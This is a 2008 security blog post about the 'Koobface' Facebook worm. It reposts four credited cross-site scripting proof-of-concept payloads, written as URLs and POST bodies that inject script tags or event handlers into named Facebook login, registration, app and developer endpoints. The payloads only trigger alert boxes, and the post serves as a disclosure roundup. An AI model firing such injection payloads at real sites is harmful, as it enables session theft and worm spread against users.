Home > Daily Thoughts, Emerging Threats > Critical Facebook XSS

Critical Facebook XSS

December 17, 2008 Leave a comment Go to comments

Facebook worm aka “Koobface” exploiting highly critical XSS vulnerability as recently discovered. It seems these guys successfully mess around in facebook as it has been around for months now. 

Further Reading xssed.com

XSS #1 with POST (by Zeitjak

http://www.new.facebook.com/r.php

POST: reg_email__=”onmouseover=”alert(‘XSS – ZJ’)”foo=”bar

XSS #2 with POST (by David Wharton

https://login.facebook.com/login.php?iphone&next=http%3A%2F%2Fiphone.facebook.com%2F

POST: 

email=biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C%22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=Login

XSS #3 (by DaiMon)

http://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cscript%3Ealert(%22DaiMon%22)%3C/script%3E

This one works on another IP (67.228.87.82) and can’t be used for a worm, except a phishing one.

XSS #4 with POST (by p3lo)

http://developers.facebook.com/tools.php?fbml

POST: 

profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=

–>> Hmmm nice PoC to play around.

Categories: Daily Thoughts, Emerging Threats Tags: , ,
  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Cancel

Connecting to %s

Follow

Get every new post delivered to your Inbox.

%d bloggers like this: